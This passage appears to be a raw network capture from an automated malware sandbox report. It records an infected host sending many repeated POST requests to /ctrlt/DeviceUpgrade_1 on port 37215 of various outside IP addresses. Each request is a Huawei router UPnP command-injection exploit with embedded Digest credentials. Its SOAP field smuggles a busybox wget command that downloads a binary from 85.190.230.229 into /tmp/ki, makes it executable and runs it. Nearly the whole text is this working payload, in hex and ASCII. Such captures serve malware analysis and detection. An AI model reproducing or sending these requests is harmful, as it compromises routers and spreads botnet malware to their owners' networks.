                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.946161985 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.450156927 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.442275047 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.393996000 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.425851107 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.361490011 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:35.976913929 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:06.951618910 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      58192.168.2.1434256156.203.13.2737215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.613717079 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      59192.168.2.1440782102.73.253.14537215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.614814043 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.946176052 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 